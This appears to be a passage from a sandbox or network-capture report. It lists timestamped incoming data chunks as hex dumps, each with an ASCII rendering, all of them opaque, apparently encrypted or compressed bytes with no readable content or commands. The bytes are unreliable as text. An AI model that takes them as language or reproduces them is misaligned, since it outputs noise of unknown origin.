2023-09-26 07:46:56 UTC	140	IN	Data Raw: 89 f1 24 34 d4 53 b7 7e a2 3b 45 ba ef 53 64 dd cf a3 49 d2 7c 32 81 6b 1e c7 7c 77 88 26 6d 17 8a 2d 22 72 87 cb 6d 40 f7 67 70 ff 38 13 e2 c7 03 26 14 3a c4 25 2a d4 23 a5 a5 c7 00 07 60 72 e9 31 21 68 23 27 21 78 e9 2b e2 c7 06 07 60 6b 22 cd 62 f9 01 19 21 39 12 65 2b 7f c2 30 71 1e 03 79 3f ff 25 7b 77 64 42 09 90 e2 16 84 eb 0c ef a6 21 00 02 52 24 14 fc e7 ab 4b 10 1b a1 39 1e 63 e1 31 05 1e 7d 1f 35 53 54 d4 26 c7 2f 6f ea 22 df 67 43 d7 aa b4 d2 77 e8 5f 56 02 41 d7 ad e6 60 df 69 06 00 3f 09 1d b1 4a 0d e7 2f 1f e7 53 e1 82 39 4a 45 1f 7f 21 a1 03 16 15 a1 5f 4c 28 e0 81 86 ef 3c 4f 59 29 f5 ff e9 29 81 02 e2 3b 6d be 80 4c 0b 3c 54 76 89 84 22 0f 46 7d 6b e6 56 ef 0c 58 7b ce 3d 4e 62 1c c2 37 c2 54 53 ce 79 7d 29 2e 8a 0d 1a 56 66 2f a3 64 0c Data Ascii: $4S~;ESdI\|2k\|w&m-"rm@gp8&:%*#`r1!h#'!x+`k"b!9e+0qy?%{wdB!R$K9c1}5ST&/o"gCw_VA`i?J/S9JE!_L(<OY));mL<Tv"F}kVX{=Nb7TSy}).Vf/d
2023-09-26 07:46:56 UTC	144	IN	Data Raw: af 29 53 26 2a b3 66 5b e5 02 35 c8 24 54 9e 2a 26 6d 6f ea fa 49 fe c4 04 14 2f 57 ce 1e 8c 04 64 3b bf 5b e5 32 68 54 ce 1b 9f 00 6e 37 d7 9b 27 62 23 44 a7 ef f4 12 0d af c8 c3 06 f3 c0 7c 3c 48 5e 39 40 24 af 03 75 21 12 0a 1d 61 fd 77 2e 07 f8 01 08 61 3f 81 e5 63 b4 c1 0d a7 96 a9 62 63 1f 2b 67 20 3d 49 64 63 fe d2 36 e5 f8 01 56 76 fc 00 99 21 5f b2 2f d3 75 31 f4 b0 75 4b 52 48 b4 22 cd 07 30 bc a4 10 3e 64 af e5 7a 02 21 63 7d 81 e3 63 1d 00 66 5a ee 70 fb ea 53 b2 8f 2c e6 62 22 65 6c f2 a9 71 07 9e 77 da cf 00 32 89 ff d3 2a 24 ed 10 de 9e 64 8f 27 6c 91 12 27 66 32 5d e1 24 ee d3 5e 61 b4 c7 f7 61 ce 3c 94 ea 3f d8 d9 85 2a ba 67 65 d7 7c d5 63 09 8e 95 ec 33 ea 13 73 c6 a2 0d 15 1b 89 2b 63 5f 80 88 14 39 f4 66 69 39 62 53 82 b4 0f 4a e2 90 Data Ascii: )S&f[5$T&moI/Wd;[2hTn7'b#D\|<H^9@$u!aw.a?cbc+g =Idc6Vv!_/u1uKRH"0>dz!c}cfZpS,b"elqw2$d'l'f2]$^aa<?ge\|c3s+c_9fi9bSJ
2023-09-26 07:46:56 UTC	148	IN	Data Raw: 45 77 e2 e8 52 d2 55 71 a6 1e e2 f0 61 3b 02 26 c1 b6 26 af a1 53 26 06 89 75 9d 87 70 1f c4 0e 6e bb 5b 46 68 c9 c2 72 69 30 06 a2 2f 7f 03 ad 74 a7 77 62 62 9f 9a 66 ee 6b 26 0e ec b3 26 2c 25 5f 0a 76 01 27 26 77 33 68 23 46 66 77 ea e8 c3 1b 48 53 3d 3f fd 33 21 0f 41 26 e2 c7 32 5c 6e ba 10 47 66 bd 9a b8 6e 36 40 0d 5a fa a2 2b 75 30 86 df a6 df 05 07 51 7f 0a 06 30 6f 62 2e c1 17 16 ce eb 59 0a 3e 21 3c 16 76 89 73 19 36 23 3c e3 37 e0 fb d3 2a a2 32 a2 2a 31 4f 02 f6 75 2f 81 e7 71 3e d2 40 e8 73 26 3a 07 04 c7 66 15 21 89 92 45 73 92 27 44 3b fd d9 f1 3a 56 2e 68 b4 04 06 33 6f ea 20 52 cd 23 cd 72 ff 81 e7 68 6e ea 3c 51 37 62 24 42 3e 06 27 40 a3 26 7e f1 3f 8b 20 e9 59 89 25 72 3b ae 02 35 2a 06 66 e2 ff 0a ad 2c 3f 22 30 a5 3d 30 35 65 2e 68 Data Ascii: EwRUqa;&&S&upn[Fhri0/twbbfk&&,%_v'&w3h#FfwHS=?3!A&2\nGfn6@Z+u0Q0ob.Y>!<vs6#<721Ou/q>@s&:f!Es'D;:V.h3o R#rhn<Q7b$B>'@&~? Y%r;5*f,?"0=05e.h
2023-09-26 07:46:56 UTC	152	IN	Data Raw: b4 01 9a e2 3f fa 27 1d 3a 81 de 7e 41 02 3c 09 3b 07 62 61 55 12 86 89 d8 e8 d9 9e 3f 3a ae 61 23 03 26 51 57 81 e2 69 b4 56 02 61 5b 51 75 32 6f 53 74 89 3f 58 64 9e c0 a1 e2 14 7b 80 26 61 ae 2a 76 89 42 f5 26 20 2f c6 3a 88 04 02 89 c0 ff 25 26 27 3f 39 e5 15 36 52 ce eb 59 00 30 65 3f 3c 36 e8 32 03 30 ed d6 18 26 41 3f 44 36 df 3e 02 70 61 69 51 74 09 c3 06 62 61 3f ea aa d7 c0 fd a5 a5 2f 12 a3 a1 4b 1a 24 4a 22 d2 4a eb 7c 02 95 46 3c 3c cf 84 3b 02 3c 61 7b 26 36 37 6c 52 4e 95 aa 83 31 3d b3 15 13 e2 28 f5 d0 e2 28 04 93 e0 28 82 2d 37 6c 53 4e 8d aa 83 31 4d b9 15 3a e0 34 c5 23 e0 28 d0 24 e0 ac ea e5 e5 26 83 a7 78 3f 4e 83 e0 76 ea a7 78 c7 b7 b6 78 3c 80 3f cb b0 86 3f 2c b7 49 c6 e0 26 c6 a0 78 7a 86 6d c9 bf 92 77 89 60 86 31 7c 6a 8a 6d Data Ascii: ?':~A<;baU?:a#&QWiVa[Qu2oSt?Xd{&a*vB& /:%&'?96RY0e?<620&A?D6>paiQtba?/K$J"J\|F<<;<a{&67lRN1=(((-7lSN1M:4#($&x?Nvxx<??,I&xzmw`1\|jm
2023-09-26 07:46:56 UTC	156	IN	Data Raw: 3b e3 3a 07 e3 66 44 3e 06 b6 2e ba c2 ae 6e bb ab 17 65 22 ce 17 21 38 c8 2b c3 38 12 26 47 ab 16 b4 66 7f 3f 2c 06 8e 1c 76 62 3c cb d9 ea 07 02 15 a1 cd ac d1 b0 6e ea 22 b3 e1 36 7c e4 c9 77 29 09 59 36 46 67 2f 58 8b b3 eb 2f c7 63 69 02 ad 70 6d fd f5 37 57 22 a3 d0 2a a1 f6 0f 69 ea 69 be 3d 55 aa 8a 2d 11 24 61 3d 52 ce 18 0c 01 e7 73 39 89 2e 30 d7 29 16 63 fd 02 66 31 b4 52 22 e8 2a 93 26 89 79 15 13 60 0d 0b 29 e4 6d 22 69 88 15 f2 b5 6f 1b 51 56 6d ed 2f 07 84 52 55 56 2e 5f 22 af 6f ff f2 24 71 70 3e a7 64 2c 03 52 78 bc fb 24 21 25 51 35 76 0e 2c 6b a4 3c 15 2d e0 37 f2 30 ce 4d 6f 16 71 68 33 36 21 ba f4 2a 15 17 b2 01 00 35 00 76 09 47 38 5a 31 32 cf 16 07 99 0e 86 41 92 d3 97 40 3c 12 cd 47 ea 0e 45 63 99 62 24 b5 d4 0d 92 62 35 22 72 e4 Data Ascii: ;:fD>.ne"!8+8&Gf?,vb<n"6\|w)Y6Fg/X/cipm7W"ii=U-$a=Rs9.0)cf1R"&y`)m"ioQVm/RUV._"o$qp>d,Rx$!%Q5v,k<-70Moqh36!*5vG8Z12A@<GEcb$b5"r
2023-09-26 07:46:56 UTC	159	IN	Data Raw: dc 33 3e 91 24 ea ee 36 ad 9c 7c 00 ec 25 3d 92 23 ea f5 47 a6 63 7f 92 24 2d 1b 5e b7 67 04 82 e7 1d ab 89 f7 de bb a2 2e f8 55 04 ad b8 bd 04 6a 67 b4 c0 f6 62 7e 63 25 92 9b 39 b2 45 af 58 26 9d 42 6d b9 6b a0 08 b9 6b a0 08 b9 6b ab 08 00 ed bd 04 e2 6b ae 6a 77 64 55 0e 6a 89 7d f2 a2 31 60 a3 e2 c3 28 76 ec 33 1f 01 7e 11 3f 48 87 e0 9e 22 15 29 7e 6a 8a f1 3e 6a 56 e1 32 ea b6 17 f9 fd d9 71 20 ad 02 7f 20 d3 77 7d 6f e9 96 91 3b 90 e4 60 a5 2c 06 25 1b 3a ad 74 5e 26 ad 5c 6c 23 03 01 44 c7 52 d0 10 26 06 6e 17 02 2d a0 4a 1a ad ae 34 c8 c5 80 b8 73 08 15 35 c5 d6 63 be 1e 26 d8 7f 6e 02 59 06 2f ba 20 b6 14 16 89 f6 ef d8 61 05 65 22 c2 77 0e 16 27 3f 9d 14 62 1d 81 1b 85 3e 52 24 60 4b 1b a5 9e 3b 77 06 75 04 d7 53 71 3f 80 f4 e8 32 80 24 e8 7d Data Ascii: 3>$6\|%=#Gc$-^g.Ujgb~c%9EX&BmkkkkjwdUj}1`(v3~?H")~j>jV2q w}o;`,%:t^&\l#DR&n-J4s5c&nY/ ae"w'?b>R$`K;wuSq?2$}
2023-09-26 07:46:56 UTC	163	IN	Data Raw: 15 27 02 95 24 4d 58 82 23 16 d4 66 3f 7f 24 75 63 26 55 7e 89 9e cf a4 62 fe 0f ae e0 2f 76 26 45 03 81 ef 9e b4 fc 15 61 ff f0 88 96 ee 4b af 25 3f 26 0e ea d6 8f 73 60 6d 5a ce d9 8c 82 21 e1 17 06 e6 51 2a 9a 70 89 64 82 01 24 1b 8f 81 20 1b 1e 2a ea bf 2b 26 6e bc 0c 0d 98 b4 02 e7 ea c8 89 dd a0 d6 00 26 92 9a 89 ee e2 de 01 d5 61 9b 82 5a 4a c0 08 53 6f 3e a2 01 49 bc c7 d9 e2 ef fd 0e a7 3b 29 47 1b 7b 23 21 ea cf 0a af 39 77 63 03 07 b6 6a 00 79 b4 b4 a2 c1 2e 86 3d e4 1c fd 46 9e c0 55 ce 88 3f 12 e6 6e 9e 24 92 01 15 e3 33 b7 3d ec 0f 48 9f 4b c2 48 ad 5d c8 48 c7 b0 c6 76 d7 93 c7 76 d2 8b 4a 88 16 cd 80 83 16 87 60 0f aa 22 29 07 bc 3f 26 61 ac 12 26 6e bb 85 40 0f 6e 6a a2 70 3f 04 ce 59 f0 c7 1a ea 32 92 67 41 0f 31 e6 33 59 a3 a7 64 6f c2 Data Ascii: '$MX#f?$uc&U~b/v&EaK%?&s`mZ!Qpd$ +&n&aZJSo>I;)G{#!9wcjy.=FU?n$3=HKH]HvvJ`")?&a&n@njp?Y2gA13Ydo
2023-09-26 07:46:56 UTC	168	IN	Data Raw: 0d 03 f6 48 39 a1 be e1 3f c1 36 ec 3b c7 2e f1 28 52 ce e5 b1 98 f5 e3 6e 03 c6 60 30 6a 72 00 21 32 22 89 63 8c 75 2d 5e 01 70 52 3f f4 71 e4 ff 74 45 ea 32 03 07 6d ba cb 52 38 b5 03 1a 61 6d 76 2a 5d 56 77 28 9e 3b 07 86 71 3d e9 20 9e 3a a6 67 11 3f 0d 98 68 b4 17 87 65 b6 32 6a 93 3b a3 f7 63 dc 02 ad 29 2f 06 af 6d cd 00 27 31 b4 7a 3e 69 d7 c2 76 66 7a 16 60 ea f0 8a 1d 91 b6 a0 23 13 9c 5d 23 ee 6d 51 26 2c d7 9b 0f 3a 4f 81 2f a2 f9 8f d5 46 d1 8b 77 89 87 f3 24 d7 b6 df d2 63 ac f1 24 e9 3d f6 54 9c 8b 5c 84 3f 3b c5 65 40 75 02 af 4a 9e da 61 11 37 f2 70 d1 2f 1b 87 b5 ce 16 3b c0 2e 03 66 e8 22 de 46 61 9c 13 27 71 64 c1 ad 6c fe 02 af 38 3b 95 34 63 84 03 d3 77 4b d3 2b 8d 5b 62 18 e5 22 a3 27 36 57 f6 4f 22 cf 14 44 98 0d 5f 2e a6 3a f3 27 Data Ascii: H9?6;.(Rn`0jr!2"cu-^pR?qtE2mR8amv*]Vw(;q= :g?he2j;c)/m'1z>ivfz`#]#mQ&,:O/Fw$c$=T\?;e@uJa7p/;.f"Fa'qdl8;4cwK+[b"'6WO"D_.:'
2023-09-26 07:46:56 UTC	172	IN	Data Raw: 17 47 67 67 50 ce dc 5f 0a c5 70 37 e2 37 e8 1d 1f 87 63 d7 f4 5b c0 2d 0e cd 69 2e 89 2b 80 3e 31 e6 07 9e 23 47 69 b7 1e 2e ea fd 16 1d 96 7f 76 33 37 57 d6 34 44 1c df 85 c1 56 e3 23 73 57 9a 40 63 f6 60 24 e3 37 ea 01 91 43 fd d9 c0 de 0b 0f a3 64 76 34 22 3c 82 06 67 d7 d7 35 21 3c a2 24 58 22 a3 2d 6e ba 82 75 e0 08 05 7f 46 6d e7 1b 53 5b 48 4d 27 a9 a3 1d 86 02 53 4e 01 fe 0a 18 f8 dc 14 9e 6a 57 69 03 25 cd 11 66 67 fd f2 e7 44 cc 0d a2 7e 3f 0e 62 68 b3 88 77 00 39 42 ac 65 9c f2 c7 68 3b 17 d2 a0 51 3a 1d b2 4a 34 02 09 67 a3 3f 85 18 62 31 05 2a 8b c2 04 4b 11 85 2b 6e ea 87 61 35 43 26 66 b4 f2 cd 57 b4 80 20 c0 1e e3 21 5a ec 75 01 80 75 06 51 eb 1f ca 21 44 f9 05 2c a6 3a 63 3a d1 a0 84 27 61 3e 13 c6 79 3f a7 38 c7 b5 63 19 c5 2a f6 76 c5 Data Ascii: GggP_p77c[-i.+>1#Gi.v37W4DV#sW@c`$7Cdv4"<g5!<$X"-nuFmS[HM'SNjWi%fgD~?bhw9Beh;Q:J4g?b1K+na5C&fW !ZuuQ!D,:c:'a>y?8cv
2023-09-26 07:46:56 UTC	176	IN	Data Raw: 74 89 4d 6b 72 48 33 8b 3b 60 3e 23 60 21 33 26 06 61 60 f4 fe 7a ff 5c a5 81 df 0b 7b e2 ff 00 b1 7e 1e 00 60 64 8f 8a 3a 70 b4 30 37 c1 35 72 86 7a df 76 2d a0 4a 20 d0 4e df d3 e6 65 38 61 3c 72 8b 56 22 e2 c2 03 29 e5 a5 c1 37 4e 02 83 3a 45 bc a3 ee 11 18 29 e6 f7 9f b8 04 52 17 96 17 49 1e 61 2d 02 05 3c 0e 65 ae 8e df 65 b2 76 26 6b c3 7e 1d e1 01 2c 53 09 09 0d 98 80 bb e1 64 5e af 31 7c 61 4a 26 29 df 71 00 77 89 3d d3 33 60 76 77 34 6e 81 54 36 62 6d ea 99 74 3e 52 52 52 1a b6 e2 60 8f 04 93 03 db c0 76 89 f1 c2 26 ab 8e 85 f4 6a 87 12 ea 66 7d 0d 67 01 33 77 2e 58 22 4e 36 70 4b 12 5e 58 22 8e 07 27 8b ba 26 11 b4 3f fa 14 7b 02 ad 65 0a d6 26 31 b5 0c ac 76 b5 02 e7 5b f5 77 38 5b fc 76 26 77 b5 54 27 eb 70 03 ac 61 fd 38 f7 14 31 81 e0 63 3f Data Ascii: tMkrH3;`>#`!3&a`z\{~`d:p075rzv-J Ne8a<rV")7N:E)RIa-<eev&k~,Sd^1\|aJ&)qw=3`vw4nT6bmt>RRR`v&jf}g3w.X"N6pK^X"'&?{e&1v[w8[v&wT'pa81c?
2023-09-26 07:46:56 UTC	180	IN	Data Raw: 31 3a 57 4e 2d 92 d3 71 03 9f 02 b5 60 13 e3 26 32 df 02 04 c0 ce 05 76 89 61 b2 2e e2 fb 3c 1a 82 37 70 29 68 34 a0 3a 61 3e 89 67 41 33 59 02 41 c9 c2 5c e2 df 72 2f e2 ff 00 d2 60 1b 9c 47 c9 3f c9 09 6e 28 00 22 20 38 dc 60 e7 2c 43 24 3a 74 13 17 67 7d 3d 20 91 3e 92 21 61 69 83 16 7e 37 31 e6 a6 3a 92 36 62 3e 03 26 07 b4 44 02 ea 71 46 44 31 7f a8 ce ae 88 30 32 c1 19 86 44 33 0f 49 75 34 68 71 24 50 63 89 26 2f 27 81 e9 9e bc c2 22 61 04 cd 53 34 b4 4c 3a e4 1f cb 53 2f 0c d0 46 ea 4f 05 66 eb 57 07 ac 31 39 81 ad a0 2f e0 36 6a ee 52 27 29 3b 31 26 ba b5 7a 25 6a ee 88 7e 63 3d e2 26 09 3e 31 cb a0 dc 28 36 a5 b2 db 36 60 37 53 26 6a d4 02 2d b0 b6 6c 3e e8 69 1e 66 e2 ff 0a 1f 1f 2f 93 23 75 20 9d 23 fe 3a 9d 23 fe 3a 92 23 71 b6 54 cc 75 ad 07 Data Ascii: 1:WN-q`&2va.<7p)h4:a>gA3YA\r/`G?n(" 8`,C$:tg}= >!ai~71:6b>&DqFD102D3Iu4hq$Pc&/'"aS4L:S/FOfW19/6jR');1&z%j~c=&>1(66`7S&j-l>if/#u #:#:#qTu
2023-09-26 07:46:56 UTC	184	IN	Data Raw: ad 0d a2 63 d7 00 80 4a fe 64 25 22 1b 4e a5 89 fd 8d 62 c8 50 31 06 62 c7 43 a7 73 c0 8b 5a 45 13 05 35 27 2e 01 35 07 b4 c7 26 2a 59 29 65 36 1f 12 a5 6d df 47 cf 62 78 cf a2 27 54 41 64 23 7f 41 0a 07 14 ea 66 2f 27 46 0d 8f 3f 00 3a e0 da a0 33 b0 2f 89 eb e8 6b a2 60 9b b4 d3 76 ec 4b 32 22 23 38 64 86 65 1f 1e ad ab dd 05 06 7c 9e 1b 77 89 a9 53 67 70 6b 26 16 01 3c 2a 43 2d 6c 82 62 62 d7 e9 0b ea f1 a1 76 51 6e ea e6 53 3c 62 e7 e9 b4 ea eb c1 2a 56 06 ec 9f 17 be 47 9c 17 66 08 37 89 5d 2d 5b 3a d1 b0 6e ea 80 ee 3f 04 cd 7a fb 0f 04 67 59 21 20 61 c9 41 27 9e 4a 0f ad 32 3f 4e 71 33 c0 17 ea 50 7c 0a 26 8a 15 0b 2e 4a c6 89 e7 99 b4 f5 ad 41 38 26 4c 22 29 63 85 01 3d 0b e0 65 76 53 86 7e 0f 53 76 89 2f 52 72 9f c0 62 3e 59 b4 fa 0e 33 d7 c4 66 Data Ascii: cJd%"NbP1bCsZE5'.5&Y)e6mGbx'TAd#Af/'F?:3/k`vK2"#8de\|wSgpk&<C-lbbvQnS<b*VGf7]-[:n?zgY! aA'J2?Nq3P\|&.JA8&L")c=evS~Sv/Rrb>Y3f
2023-09-26 07:46:56 UTC	188	IN	Data Raw: 0d 27 20 0b 8b 5b 61 7e 81 e3 65 0d 8b 86 61 b4 bd a7 6a 3e 36 a3 9e 37 77 a0 ea ff 0b 4e 11 29 40 a6 61 55 06 70 34 d7 7c d6 0e 16 f2 36 52 e4 72 2b e7 8d 1b 63 61 9f 89 76 5d bf 38 e6 e0 ac e3 26 c3 c5 c5 8c e1 43 13 96 68 2f 2b 27 61 b7 46 37 9e ba d9 52 58 3f 89 6b 9d b4 57 26 ea 4e 8a 1a ea 7d e3 2c ab 05 14 c6 d2 f9 cb c6 d2 ff 08 ec 5b 69 e3 95 c4 35 57 cc d2 0c 37 39 7a 4e 05 33 20 20 89 86 29 03 53 4e 11 6f 1f 74 45 5c 61 d6 2f 7d 03 ce 78 30 50 a1 c1 67 12 a4 22 9f 0f 1d b9 30 80 68 f1 27 23 27 6c 6a ea d8 7a 2a 69 15 a1 b4 10 31 8a 16 92 76 62 3b 89 2e 31 3f 82 2e ea 6e 4e ad 69 6d 52 26 91 6d ea 41 b1 fe 26 94 63 ae 03 14 2f 5f 52 70 89 0f d3 44 60 5f 0b 23 e1 f9 02 26 3f fc c4 20 21 3f 41 da 65 8d 00 70 89 3a dd c2 49 4a 02 24 3f fc 54 ce 27 Data Ascii: ' [a~eaj>67wN)@aUp4\|6Rr+cav]8&Ch/+'aF7RX?kW&N},[i5W79zN3 )SNotE\a/}x0Pg"0h'#'ljz*i1vb;.1?.nNimR&mA&c/_RpD`_#&? !?Aep:IJ$?T'
2023-09-26 07:46:56 UTC	191	IN	Data Raw: f7 7f 14 c1 25 e3 3c 55 14 37 7f 01 64 90 ff 87 64 62 6f 6a ac 61 2d 01 e3 73 3c 1e cd 25 1f 20 83 9e 3d 10 de 63 d3 23 d7 63 aa f6 24 73 2b 91 74 09 e3 52 27 33 d7 7d 35 33 3e 11 61 e8 22 83 60 31 d7 a7 37 12 31 3b 3b 31 0f 11 29 e5 b2 c9 b7 26 49 0b 2b 10 39 89 33 e2 39 22 06 01 96 f2 d9 9e 6f 90 64 13 36 52 4a 89 12 79 2f 9c 3d 7b d1 63 4e 0b 76 09 d7 ff 37 14 36 0f 74 60 4e 0b 77 7d d7 e5 74 60 6f 5f 17 60 b6 1f 5e 50 bf 0b 74 89 33 81 2f c1 19 31 e6 70 4d 24 75 34 69 72 6a 71 68 89 2e 9f bc cb d6 a3 cd ac ad 0d 37 26 3e db 9e 50 d1 b0 76 89 c6 9c b2 5e 17 9e bf 03 46 60 5f 50 27 71 3e 8f 4a 48 c0 39 ce 13 3f 5b ac 24 3f 3e 1c 15 0f 02 1a 5a 4b 2e a3 b3 4b 21 66 5a e1 70 39 52 f6 90 bb eb 3f 09 ac f1 bf 33 60 61 05 10 b7 30 3f 77 2e d3 3b 49 cd 7f 3f Data Ascii: %<U7ddboja-s<% =c#c$s+tR'3}53>a"`171;;1)&I+939"od6RJy/={cNv76t`Nw}t`o_`^Pt3/1pM$u4irjqh.7&>Pv^F`_P'q>JH9?[$?>ZK.K!fZp9R?3`a0?w.;I?
2023-09-26 07:46:56 UTC	195	IN	Data Raw: 61 3f 03 26 f9 bc c6 2a 5a 42 0a 51 61 f0 5c 7d 3e 62 c1 ad 25 3f 26 22 ea 73 26 2e 5a fe 02 70 15 22 89 72 45 2f 89 26 93 75 87 d0 15 2d 51 ab 61 4d 03 ac 78 b5 12 ae 79 3f 42 ae 70 7e 4c 53 92 64 00 78 60 46 83 ca 19 3b 02 26 61 6c 54 ad 14 37 55 4e 39 3f 35 65 61 69 ea 85 05 3f 00 26 60 53 77 31 52 c0 64 a5 61 41 00 1c 14 0d 64 ad 67 3f 64 1d a6 4b 19 40 58 41 02 22 14 2a 68 24 39 9c 6a 06 4d 79 02 85 0d 3f 06 a5 a9 3f fd cf e2 3d 02 26 31 d7 02 d0 02 3f 02 29 d6 ff 5b a6 e2 d7 62 cd 64 d7 a7 a6 67 3f 8b 63 81 b2 87 b6 9c c0 02 d9 31 69 fd 33 fd 0f 41 26 61 bc c9 d9 e8 7a ee 1d f1 fc 0d a3 c9 3f 5f 4e 31 bd 35 04 52 bb 35 29 e5 be 03 2c 65 3e 02 26 61 b2 87 ae 9a c0 fd 26 37 6f ea 9e 03 3f 02 ad 63 cf 03 56 96 4b 64 70 89 c7 03 26 55 bc fa 25 38 4b 09 Data Ascii: a?&ZBQa\}>b%?&"s&.Zp"rE/&u-QaMxy?Bp~LSdx`F;&alT7UN9?5eai?&`Sw1RdaAdg?dK@XA"h$9jMy??=&1?)[bdg?c1i3A&az?_N15R5),e>&a&7o?cVKdp&U%8K
2023-09-26 07:46:56 UTC	200	IN	Data Raw: 52 52 85 62 ba f4 52 27 b4 0a 7a 45 2f 22 16 5f 6c ea 13 40 fe 29 ad 99 b4 04 c6 c2 10 52 22 89 19 c2 27 5a f8 5b 50 76 3f 89 20 e1 03 3a 1b 14 30 42 71 32 6f ea da 03 5e 46 2a 64 1f 06 23 e1 61 e9 f5 ea 39 8f 66 25 07 03 cd 63 0c e2 63 3a 0f c1 75 34 69 80 11 84 85 0d 29 61 89 05 4c 69 6f ea 9c 9a 26 62 82 38 d4 c3 27 22 b8 88 22 20 37 81 c6 69 9f 0a 25 26 d4 d0 26 6e 89 35 61 e2 c1 2f ad 23 d1 62 2c 9f 14 77 22 80 3e 31 e4 ba 58 c1 22 37 d7 7b 25 69 5a c1 2e 11 bc e2 e6 f6 4b 0f ab 65 1f 99 ab 3d 79 d2 27 67 d4 cd 26 e2 c2 2f ad a2 4a 00 d1 61 e7 5d 78 3c 64 c1 d9 15 2f 26 22 89 53 62 7d 38 fc ce 27 e1 1e 46 02 79 34 c2 53 79 3a e2 74 75 de 68 15 b3 c8 f3 ad 6b e7 22 27 6d df 02 f5 8a 7e 89 0c a9 ff 22 32 01 02 12 47 63 ee eb 26 b0 e4 d3 cc b0 e7 09 ef Data Ascii: RRbR'zE/"_l@)R"'Z[Pv? :0Bq2o^F*d#a9f%cc:u4i)aLio&b8'"" 7i%&&n5a/#b,w">1X"7{%iZ.Ke=y'g&/Ja]x<d/&"Sb}8'Fy4Sy:tuhk"'m~"2Gc&
2023-09-26 07:46:56 UTC	204	IN	Data Raw: 02 0a 37 bc 12 e6 21 d4 1b b6 60 3d 77 0b 61 bb d9 52 64 bf f9 0a 14 b5 26 a4 60 3a 40 21 89 7e ea 44 31 16 72 27 15 b9 02 24 e3 df 4d ab 16 b7 03 cd e4 1d 6b 7d 3c fc 63 a1 25 33 54 06 6f 33 ea 80 71 7b 82 32 1f 7f 42 2d 21 8f 17 32 31 57 1a 1e 1d 7c 12 41 d1 3e 16 ce 85 1d fc 47 65 2f 82 98 30 3a 02 ab 2b b9 63 26 3f 0e 00 7e 07 0b 00 36 6d d7 c2 15 63 8e 8e 98 41 1a 46 ee 61 68 54 86 cd d7 ad 06 fe df 03 06 79 b4 ea ce 34 5f 85 ad 99 7c f3 14 61 3e 2a ce 44 dd f3 24 79 bf 39 e1 14 1b fd 2b 45 3f 01 be 19 2f a3 57 62 8f 84 d9 64 be 02 82 8a 35 42 a0 89 64 03 13 38 3f 6a ae 34 d7 f2 96 65 66 89 e5 b1 25 41 66 e9 fd 87 36 37 57 d2 16 75 d7 06 a0 8b 7f 00 15 97 b4 4f 2e 61 b6 47 d6 5a f1 77 3e 5a 35 c4 34 45 52 12 01 62 47 02 26 61 c8 da 7f 7a ff 5b 66 8a Data Ascii: 7!`=waRd&`:@!~D1r'$Mk}<c%3To3q{2B-!21W\|A>Ge/0:+c&?~6mcAFahTy4_\|a>*D$y9+E?/Wbd5Bd8?j4ef%Af67WuO.aGZw>Z54ERbG&az[f
2023-09-26 07:46:56 UTC	208	IN	Data Raw: 75 63 0d 01 6c 38 3b 02 38 db 3d 1c cc 71 b2 86 9e a5 3f 0b 2f 71 b4 02 63 9d b6 04 af 25 0f fe 26 ea 7a f2 d9 69 30 87 d1 60 3f 17 87 b1 74 4b 26 e4 ff 4a 29 e5 e3 03 87 6c f7 02 2b ea 3f 37 3a 50 7c 02 e7 80 30 02 25 29 33 b9 26 e1 3f 02 26 09 3f 42 26 61 6c 53 d9 ef e9 01 39 63 0d 06 7d 68 6f 0a 24 6f fe 06 1f 21 2f 81 82 e9 3e 6e 25 45 2e 02 29 9f 77 41 25 64 77 12 a6 61 46 41 26 14 36 81 46 65 3d fc a4 69 bc 7a 2e 9e 4a 6b 26 32 55 02 d9 11 33 fd f0 f0 3d 0b d9 11 2f 02 21 54 df 03 23 e1 2a 36 16 22 3f a3 f2 60 22 06 33 b9 bf 00 ab 65 bf c3 c6 69 3d 89 ee 63 2b 29 ee ec 73 02 37 8d 6e 8f 6e 75 6e 52 26 89 dd ed d9 9e b4 47 2e 41 bc c6 2a 9e 32 83 31 5a 3a 03 27 70 49 06 a5 0c 37 16 87 68 3e 1f 85 ad be 20 63 69 b6 3f 23 60 6d a1 a7 6f 60 5c 7d a8 fc Data Ascii: ucl8;8=q?/qc%&zi0`?tK&J)l+?7:P\|0%)3&?&?B&alS9c}ho$o!/>n%E.)wA%dwaFA&6Fe=iz.Jk&2U3=/!T#6"?`"3ei=c+)s7nnunR&G.A21Z:'pI7h> ci?#`mo`\}
2023-09-26 07:46:56 UTC	212	IN	Data Raw: e3 30 e6 a5 a6 3b 21 2f 41 43 b9 cd 67 b4 20 27 52 c0 42 a3 97 41 44 ad 62 5f 28 52 61 09 88 6b 61 c9 c3 27 15 7f 2c d0 a0 37 77 2d c1 2b 6e a5 e1 18 02 01 7f b4 c5 ad ae be 64 36 80 20 89 22 e3 59 8f 22 a9 2f 89 2d e8 37 e2 23 e9 77 06 26 26 7a 81 e5 65 04 fc 5a 69 85 31 fd e2 22 3e fe 9e b2 02 12 b9 4a 4f a3 ba f9 44 26 65 be 77 23 0b c9 5a cd 61 35 89 e5 29 c8 da 3d a1 17 81 e6 94 3f 09 16 a1 20 89 de 21 bc fd d9 15 28 55 e0 6d 33 06 03 9e be 44 18 e2 c7 00 53 61 39 82 68 65 7f e9 29 e2 2f fa 25 14 35 42 27 69 d4 06 27 c1 3f 82 65 e2 c4 01 5a fa 1d fd 24 76 c0 17 0a e1 37 5d 78 61 62 59 a5 a5 7b c1 d9 64 2d b6 46 56 57 02 c6 33 d7 48 84 70 5f 31 ad 2d 1b 42 33 e8 7e 0a 26 15 32 81 6f 6d 37 c5 67 73 27 63 25 8a 2e 82 27 65 b2 43 30 75 3f 01 66 63 3d a3 Data Ascii: 0;!/ACg 'RBADb_(Raka',7w-+nd6 "Y"/-7#w&&zeZi1">JOD&ew#Za5)=? !(Um3DSa9he)/%5B'i'?eZ$v7]xabY{d-FVW3Hp_1-B3~&2om7gs'c%.'eC0u?fc=
